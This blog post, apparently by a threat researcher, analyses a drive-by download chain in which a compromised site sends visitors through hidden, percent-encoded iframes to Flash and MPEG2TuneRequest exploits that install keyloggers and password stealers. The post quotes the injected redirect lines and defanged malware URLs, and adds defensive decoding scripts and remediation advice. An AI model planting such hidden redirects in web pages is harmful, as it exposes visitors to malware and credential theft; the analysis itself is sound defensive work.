Get – ‘Site’ – Go

Written by traversecode on . Posted in Exploit Analysis

Introduction:

When we say 'Internet', the word that immediately comes to mind is 'browser'. The browser is a major component of the online world: everyone from laymen to professionals uses it for different needs, such as checking mail, online banking, browsing forums, booking tickets, shopping and ordering pizza. When those activities involve banking transactions, tickets or purchases, we have to ask how secure we really are and whether we are exposing sensitive information such as passwords, credit card numbers and bank account details. Most malware writers target the browser to spread malware and infect users' computers, and these infections happen without the user's consent.

This article explains in detail how a compromised or malicious website redirects users to a server where an exploit is hosted. These attacks are active and in the wild.

Attack:

The attack works by redirecting the user through a series of websites and finally to a server where the exploit code is hosted. If a vulnerability the exploit code targets is present, it downloads a malicious binary and compromises the system. The entry point is often a legitimate site that has been compromised by injecting a script which redirects users to the server hosting the exploit code and malware. I'll walk through an example in which a website redirects the user to a malicious server that exploits a browser vulnerability.

The website I analyzed was 'hxxp://nbyuxing.cn/'. When I scrutinized the site thoroughly, I found the following script injected into a few pages:

‘<script src=hxxp://318%78.com></script>’

When the browser resolves this URL, %78 is decoded as 'x', giving 'hxxp://318x.com'. That page contains an iframe pointing to another page on the same server:

document.writeln("<iframe src=hxxp://%33%31%38%78%2E%63%6F%6D/%61%2E%68%74%6D width=0 height=0></iframe>");

Decoded, the iframe's URL is 'hxxp://318x.com/a.htm'. That page again contains an iframe, this time pointing to a different server:

<iframe src=hxxp://77yyj.8866.org/fkzd/16.htm width=0 height=0></iframe>

The redirection still continues, because that page again contains an iframe pointing to yet another server. Here the chain stops: the actual exploit code is hosted on this last server.

<iframe src=hxxp://109ee.cn/x150/xx.html width=111 height=0 border=0></iframe>

To make the chain easier to follow, the picture below shows the complete flow from the compromised site to the server hosting the exploit code (it shows only domains, not full URLs).

[Figure: redirection flow. nbyuxing.cn → 318x.com → 318x.com (a.htm) → 77yyj.8866.org → 109ee.cn]
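The same chain can be reconstructed mechanically. The script below is an added example, not code from the original post: it takes the four injected fragments quoted above (kept with the 'hxxp' defanging so nothing resolves), pulls out every script or iframe src, percent-decodes it the way the browser would, and flags the frames that are hidden with width=0 or height=0, which is the usual tell for a redirect the visitor is not meant to see. The page labels attached to each fragment are taken from the narrative above and are only labels.

```javascript
// Added example, not code from the original post. Reconstructs the
// redirect chain from the injected fragments quoted in the article.
// URLs keep the "hxxp" defanging so nothing here resolves.

// The fragments quoted in the article, in the order they were found.
// The "page" labels come from the article's narrative.
const FRAGMENTS = [
  { page: 'nbyuxing.cn (injected)',
    html: '<script src=hxxp://318%78.com></script>' },
  { page: '318x.com',
    html: 'document.writeln("<iframe src=hxxp://%33%31%38%78%2E%63%6F%6D/%61%2E%68%74%6D width=0 height=0></iframe>");' },
  { page: '318x.com/a.htm',
    html: '<iframe src=hxxp://77yyj.8866.org/fkzd/16.htm width=0 height=0></iframe>' },
  { page: '77yyj.8866.org/fkzd/16.htm',
    html: '<iframe src=hxxp://109ee.cn/x150/xx.html width=111 height=0 border=0></iframe>' },
];

// Percent-decode the way the browser resolves the URL. decodeURIComponent
// throws on a malformed escape (e.g. a lone '%'), so fall back to the raw text.
function percentDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Match <script ...> and <iframe ...> start tags, then their attributes.
// The injected code uses bare (unquoted) attribute values, so the attribute
// pattern accepts double-quoted, single-quoted and bare forms.
const TAG_RE = /<(script|iframe)\b([^>]*)>/gi;
const ATTR_RE = /(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+))/g;

// Return every script/iframe target in an HTML (or document.write'd) fragment.
function extractRedirects(html) {
  const found = [];
  for (const tag of html.matchAll(TAG_RE)) {
    const attrs = {};
    for (const a of tag[2].matchAll(ATTR_RE)) {
      attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    }
    if (!attrs.src) continue;
    const decoded = percentDecode(attrs.src);
    found.push({
      tag: tag[1].toLowerCase(),
      raw: attrs.src,
      decoded,
      obfuscated: decoded !== attrs.src,                    // percent-encoding used to hide the host
      hidden: attrs.width === '0' || attrs.height === '0',  // zero-size frame: invisible to the visitor
    });
  }
  return found;
}

// Walk the fragments and produce the hop list: where each fragment was found
// and where it sends the browser next.
function buildChain(fragments) {
  const hops = [];
  for (const { page, html } of fragments) {
    for (const r of extractRedirects(html)) {
      hops.push({ from: page, to: r.decoded, via: r.tag, hidden: r.hidden, obfuscated: r.obfuscated });
    }
  }
  return hops;
}

// Stand-alone run: print the chain one hop per line.
if (typeof require !== 'undefined' && require.main === module) {
  for (const h of buildChain(FRAGMENTS)) {
    const flags = [h.hidden ? 'hidden' : null, h.obfuscated ? 'percent-encoded' : null]
      .filter(Boolean).join(', ');
    console.log(`${h.from} --${h.via}--> ${h.to}${flags ? ' [' + flags + ']' : ''}`);
  }
}
```

Running it prints one line per hop; the first hop is flagged as percent-encoded and the three iframe hops as hidden, which is exactly the combination (an obfuscated host followed by zero-size frames) that makes such an injection worth pulling from a page during triage.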

The malicious code at hxxp://109ee.cn/x150/xx.html is written to exploit Flash Player and the MPEG2 Tune Request vulnerability. But how does it exploit them?

The script first checks whether the browser is Internet Explorer 6 and whether the operating system is Windows XP (which identifies itself as 'Windows NT 5.1' in the user-agent string). If so, it uses the MPEG2 Tune Request vulnerability, which is widespread and still being used against users in the wild. The vulnerability lies in the 'MPEG2TuneRequest' ActiveX object and is triggered when the object is instantiated with malformed input passed through the 'data' parameter. The associated CLSID for MPEG2 Tune Request is

0955AC62-BF2E-4CBA-A2B9-A63F772D46

If the Internet Explorer version is greater than 7, or the browser is Firefox, the code uses an Adobe Flash Player vulnerability instead. It checks the installed Flash Player version and, if the condition is satisfied, downloads .swf files that exploit the vulnerability.

The URL in the MPEG2TuneRequest exploit code was encoded, as seen below:

[Image: XOR-encoded string in the MPEG2TuneRequest exploit code]

Once I found the XOR key and decoded the obfuscated string, the decrypted code revealed the URL from which the malware is downloaded:

[Image: decoded exploit code showing the download URL]
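An added example of the key-recovery step (not the article's own code; the obfuscated bytes of the real sample appear only in the screenshot and are not reproduced here): a single-byte XOR key can be recovered without guessing by sliding a known plaintext, the 'http://' prefix the decoded URL must start with, over the blob. The sample blob, its key 0x5a and the placeholder URL below are constructed for this example. The search reports the offset as well as the key, because in shellcode the URL usually sits after the code rather than at offset 0, and the decoder stops at the NUL byte that terminates the string.

```javascript
// Added example, not the article's code. Recovers a single-byte XOR key from
// an obfuscated blob by known plaintext and decodes the NUL-terminated
// string that follows. The blob, key and URL below are constructed for this
// example; the real sample's bytes are only in the article's screenshot.

const toBytes = (s) => Uint8Array.from(s, (c) => c.charCodeAt(0) & 0xff);
const fromBytes = (b) => String.fromCharCode(...b);

// Constructed sample: a few bytes of "code" filler, then a NUL-terminated
// placeholder URL, the whole thing XORed with one byte (0x5a).
const SAMPLE_KEY = 0x5a;
const SAMPLE_URL = 'http://download.example.invalid/xx/x150.css';
const SAMPLE_BLOB = (() => {
  const filler = [0x90, 0x90, 0xeb, 0x10, 0x31, 0xc0, 0x50, 0x68];
  const plain = Uint8Array.from([...filler, ...toBytes(SAMPLE_URL), 0]);
  return plain.map((b) => b ^ SAMPLE_KEY);
})();

// Slide the crib over the blob. At each offset the first byte fixes the only
// possible key; the rest of the crib must agree with it. Returns the first
// {key, offset} that matches, or null when the crib occurs nowhere.
function findXorKey(blob, crib) {
  const c = toBytes(crib);
  for (let off = 0; off + c.length <= blob.length; off++) {
    const key = blob[off] ^ c[0];
    let ok = true;
    for (let j = 1; j < c.length; j++) {
      if ((blob[off + j] ^ key) !== c[j]) { ok = false; break; }
    }
    if (ok) return { key, offset: off };
  }
  return null;
}

// Decode from `offset` under `key` until the (decoded) NUL terminator.
function decodeCString(blob, key, offset) {
  const out = [];
  for (let i = offset; i < blob.length; i++) {
    const b = blob[i] ^ key;
    if (b === 0) break;
    out.push(b);
  }
  return fromBytes(out);
}

// Convenience: recover the download URL using "http://" as the crib.
function recoverUrl(blob, crib = 'http://') {
  const hit = findXorKey(blob, crib);
  if (!hit) return null;
  return { ...hit, url: decodeCString(blob, hit.key, hit.offset) };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = recoverUrl(SAMPLE_BLOB);
  console.log(r ? `key=0x${r.key.toString(16)} offset=${r.offset} url=${r.url}` : 'no match');
}
```

For a repeating multi-byte key the same sliding search works, provided the crib is longer than the key so that at least one key byte is checked twice; a seven-byte 'http://' crib therefore pins down keys of up to six bytes on its own, and a longer crib such as a known file extension at the end of the string extends that.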

The .swf file downloaded from the server also contains a URL, as seen below:

[Image: URL embedded in the downloaded .swf file]

When either exploit succeeds, it downloads 'hxxp://d.khtgf.cn/xx/x150.css', which despite its .css extension is an executable file.

I was curious to know what this malware does, so I analyzed the downloaded file. It in turn downloaded a batch of further files into the System folder:

[Image: files dropped into the System folder]

These files are game-account stealers, password stealers and key loggers. Most of them are DLLs that hook into all running processes, as shown below, to monitor user activity. Because an injected DLL runs inside an existing process rather than as a process of its own, it does not show up in Task Manager, which makes it very hard for the user to notice the malware on his or her system.

[Image: malicious DLLs loaded into running processes]

The malware captures data and keystrokes and steals password information. Once the information is captured, it is sent to a remote server via HTTP POST.

Solution:

To avoid such attacks, it is important to keep web applications patched with the latest security updates so that attackers cannot compromise the website in the first place. Strong passwords for the web application and related services such as FTP also matter, to resist brute-force attacks. If you find injected code like the above on your website, the site is already compromised. As an immediate action, remove the injected code, change the passwords of the web applications and related accounts, scan the server to check whether any malware is hosted on it, and patch the applications with the latest security updates. From the user's perspective, it is very important to keep every application updated, from the operating system to Flash Player, PDF readers and so on, to avoid becoming a victim.


Comments (2)

  • urdiendo

    Good Blog!

  • Shiv - Threat Research Analyst

    Thank you.
